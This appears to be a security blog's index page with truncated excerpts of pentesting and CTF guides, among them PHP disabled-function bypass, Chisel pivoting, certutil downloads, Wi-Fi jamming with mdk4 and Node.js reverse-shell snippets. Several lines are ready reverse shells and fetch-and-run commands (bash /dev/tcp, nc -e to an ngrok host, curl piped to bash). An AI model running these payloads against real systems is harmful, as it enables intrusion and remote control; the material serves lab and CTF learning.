Security

Sometimes system, exec, shell_exec, and other dangerous PHP functions are disabled. Chankro helps us bypass these by using LD_PRELOAD and custom shared objects. 🧠 Step-by-Step Guide 🔍 1. Identify Target Architecture Access the phpinfo.php page on the target. Look for architecture info: Architecture => x86_64 → 64-bit Architecture => i686 or i386 → 32-bit 💣 2. Create Shell Script Prepare a Bash reverse shell in a file named shell: echo "bash -c 'exec bash -i >& /dev/tcp/10.10.14.5/9001 0>&1'" > shell ⚙️ 3. Install Chankro If not installed: ...

🧠 What is Chisel? Chisel is a fast TCP/UDP tunnel over HTTP, useful for port forwarding and pivoting, especially during red teaming or CTFs. 🔥 Attacker Machine Setup (Chisel Server) Start Chisel in reverse mode on the attacker machine: ./chisel_1.5.1 server -p 9005 --reverse -p 9005: Listen on port 9005 --reverse: Accept reverse port forwarding connections 🎯 Target Machine Setup (Chisel Client) Forward all traffic to attacker: ./chisel client 10.10.14.19:9005 R:socks This sets up a SOCKS proxy from the target to the attacker’s Chisel server ...

Method 1: Using an HTTP Server Step 1: Start an HTTP server on Linux Open a terminal on your Linux machine and run: sudo python3 -m http.server 80 Step 2: Download the file using certutil on Windows Open Command Prompt or PowerShell on your Windows machine and run: certutil.exe -urlcache -split -f "http://10.10.14.7/msf.exe" Method 2: Using Invoke-WebRequest Step 1: Start an HTTP server on Linux Same as Step 1 in Method 1. Step 2: Download the file using Invoke-WebRequest on Windows Open PowerShell on your Windows machine and run: ...

This simple guide helps you fix the GRUB bootloader on Garuda Linux with a BTRFS file system. Follow these steps to install the necessary tools, mount partitions, fix GRUB, and check EFI entries. Step 1: Install garuda-tools-base-git You need the garuda-tools-base-git package to manage GRUB on Garuda Linux. Install it using pacman: sudo pacman -S garuda/garuda-tools-base-git This package is only available for Garuda Linux and won’t work with other Arch-based distributions. ...

File Inclusion and Path Traversal At a Glance File inclusion is the method for applications, and scripts, to include local or remote files during run-time. The vulnerability occurs when an application generates a path to executable code using an attacker-controlled variable, giving the attacker control over which file is executed. There are two different types. Local File Inclusion (LFI) where the application includes files on the current server. And Remote File Inclusion (RFI) where the application downloads and execute files from a remote server. 1 ...

📤 Uploading/Sending a Directory from Local to SSH Server Use either of the following commands: scp -P 22 -r ./shell/* [email protected]:/home/gnu/shell/ OR scp -r -P 22 ./shell [email protected]:/home/gnu/shell/ 📥 Downloading/Receiving a Directory from SSH Server to Local scp -P 22 -r [email protected]:/home/gnu/* ./gnu/ OR scp -r -P 22 [email protected]:/home/gnu ./gnu/ 📤 Uploading/Sending a File from Local to SSH Server scp -P 22 ./shell.php [email protected]:/home/gnu/shell.php 📥 Downloading/Receiving a File from SSH Server to Local scp -P 22 [email protected]:/home/gnu/flag.txt ./flag.txt 📝 Note: ...

These codes indicate that the request was successfully received, understood, and accepted. 200 OK: The request was successful. 201 Created: The request was successful, and a resource was created. 202 Accepted: The request has been accepted but not yet processed. 204 No Content: The request was successful, but there is no content to send back. 3xx: Redirection These codes indicate that further action is needed to complete the request. 301 Moved Permanently: The resource has been permanently moved to a new URL. ...

With the mdk4 tool, you can jam Wi-Fi networks in various ways. This guide will walk you through the installation, setup, and usage of mdk4, including examples for different attacks. 1. Installation If mdk4 is not installed on your system, install it using the following command: sudo apt-get install mdk4 -y Switching to Root User If you are not the root user, switch to root: sudo su Example: kali@gajendra:~$ sudo su 2. Checking Network Interface Status Check your network interface status to see if it’s in monitor mode: ...

Useful JavaScript snippets for remote command execution, reverse shells, and post-exploitation via Node.js or vulnerable eval() injection. 📄 Basic Reverse Shell using child_process.exec() require('child_process').exec('nc 0.tcp.in.ngrok.io 18402 -e /bin/sh') 📌 Listener on attacker side: nc -lvnp 18402 📄 Spawn a shell via spawn() method require('child_process').spawn('/bin/sh', []) This spawns an interactive shell on the server if injected. 📄 Execute a simple Linux command require('child_process').exec('ls -la', function(error, stdout, stderr) { console.log(stdout) }) 📄 Download and execute a script (e.g., reverse shell script) require('child_process').exec('curl http://10.10.14.5/rev.sh | bash') 📄 Reverse shell using bash and TCP require('child_process').exec('bash -i >& /dev/tcp/10.10.14.5/9001 0>&1') 💡 Use this when nc -e is restricted or not available. ...

📂 Files Dockerfile (placed in empty folder) FROM kalilinux/kali-rolling ENV DEBIAN_FRONTEND=noninteractive TZ=Etc/UTC # install essentials: zsh sudo tzdata chrony util-linux iproute2 RUN apt update && apt install -y \ zsh sudo tzdata chrony util-linux iproute2 \ && useradd -m -s /usr/bin/zsh kali \ && echo "kali:kali" | chpasswd \ && usermod -aG sudo kali \ && apt clean && rm -rf /var/lib/apt/lists/* USER kali WORKDIR /home/kali ENTRYPOINT ["/usr/bin/zsh","-l"] 🛠️ Build Image Run from the folder with Dockerfile docker build -t kali-zsh-vm:privileged . 🚀 Create and Run Persistent Privileged Container This creates kali-persistent with host timezone and /tmp/test mounted ...